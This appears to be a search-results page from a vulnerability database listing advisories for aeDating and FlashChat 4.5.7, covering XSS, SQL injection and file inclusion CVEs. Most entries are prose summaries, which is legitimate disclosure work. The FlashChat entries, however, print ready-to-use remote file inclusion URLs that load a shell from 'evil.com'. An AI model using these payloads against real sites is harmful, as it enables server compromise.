37 matches found
FlashChat 4.5.7 - aedating4CMS.php Remote File Inclusion
FlashChat 4.5.7 - aedating4CMS.php Remote File Inclusion NeXtMaN Here are 3 RFI vulnerabilities in Flashchat i've found: Code: http://site.com/scriptpath/inc/cmses/aedating4CMS.php?dirinc=http://evil.com/shell.txt?...
FlashChat 4.5.7 - 'aedating4CMS.php' Remote File Inclusion
NeXtMaN Here are 3 RFI vulnerabilities in Flashchat i've found: Code: http://site.com/scriptpath/inc/cmses/aedating4CMS.php?dirinc=http://evil.com/shell.txt? http://site.com/scriptpath/inc/cmses/aedatingCMS2.php?dirinc=http://evil.com/shell.txt?...
CVE-2006-3279
Cross-site scripting XSS vulnerability in aeDating 4.1 allows remote attackers to inject arbitrary web script or HTML via the 1 Sex parameter in index.php, 2 ProfileType parameter in joinform.php, and 3 Email parameter in forgot.php...
CVE-2006-3279
Cross-site scripting XSS vulnerability in aeDating 4.1 allows remote attackers to inject arbitrary web script or HTML via the 1 Sex parameter in index.php, 2 ProfileType parameter in joinform.php, and 3 Email parameter in forgot.php...
CVE-2006-3279
CVE-2006-3279 describes a cross-site scripting (XSS) vulnerability in aeDating 4.1. The affected application exposes three vulnerable input points: the Sex parameter in index.php, the ProfileType parameter in join_form.php, and the Email parameter in forgot.php. These allow remote attackers to in...
CVE-2005-2985
SQL injection vulnerability in searchresult.php in AEwebworks aeDating Script 4.0 and earlier allows remote attackers to execute arbitrary SQL statements via the Country parameter...
CVE-2005-2985
The CVE refers to a SQL injection vulnerability in AEwebworks aeDating Script 4.0 and earlier, exploitable via the Country parameter in search_result.php. The root cause is unsanitized user input leading to arbitrary SQL execution; affected product versions are aeDating Script 4.0 and earlier. Im...
AEwebworks aeDating 3.2/4.0 - 'search_result.php' SQL Injection
source: https://www.securityfocus.com/bid/14847/info AEwebworks aeDating is prone to an SQL injection vulnerability. This is due to a lack of proper sanitization of user-supplied input before it is used in an SQL query. Successful exploitation could result in a compromise of the application,...
CVE-2005-1085
Cross-site scripting XSS vulnerability in the control panel in aeDating 3.2 allows remote attackers to inject arbitrary web script or HTML...
CVE-2005-1083
index.php in aeDating 3.2 allows remote attackers to include arbitrary files via the skin parameter...
CVE-2005-1084
SQL injection vulnerability in sdating.php in aeDating 3.2 allows remote attackers to execute arbitrary SQL commands files via the event parameter...
CVE-2005-1085
Cross-site scripting XSS vulnerability in the control panel in aeDating 3.2 allows remote attackers to inject arbitrary web script or HTML...
CVE-2005-1083
index.php in aeDating 3.2 allows remote attackers to include arbitrary files via the skin parameter...
CVE-2005-1085
CVE-2005-1085 : The vulnerability is a cross-site scripting (XSS) issue in the aeDating 3.2 control panel that allows remote attackers to inject arbitrary web script or HTML. Connected sources (NVD, Red Hat, CVE listings) reiterate the same description without providing technical details such as ...
CVE-2005-1083
CVE-2005-1083 concerns index.php in aeDating 3.2, where an attacker can remotely include arbitrary files via the skin parameter. This is a plain file inclusion vulnerability and results in arbitrary file inclusion. Context from multiple sources (NVD/Red Hat/CVE records) confirms the affected prod...
CVE-2005-1084
The CVE describes an SQL injection in aeDating 3.2 involving sdating.php where the event parameter can be exploited by remote attackers to execute arbitrary SQL commands. Affected component: sdating.php within aeDating 3.2. Root cause: improper handling/sanitization of the event parameter leading...
CVE-2005-1084
SQL injection vulnerability in sdating.php in aeDating 3.2 allows remote attackers to execute arbitrary SQL commands files via the event parameter...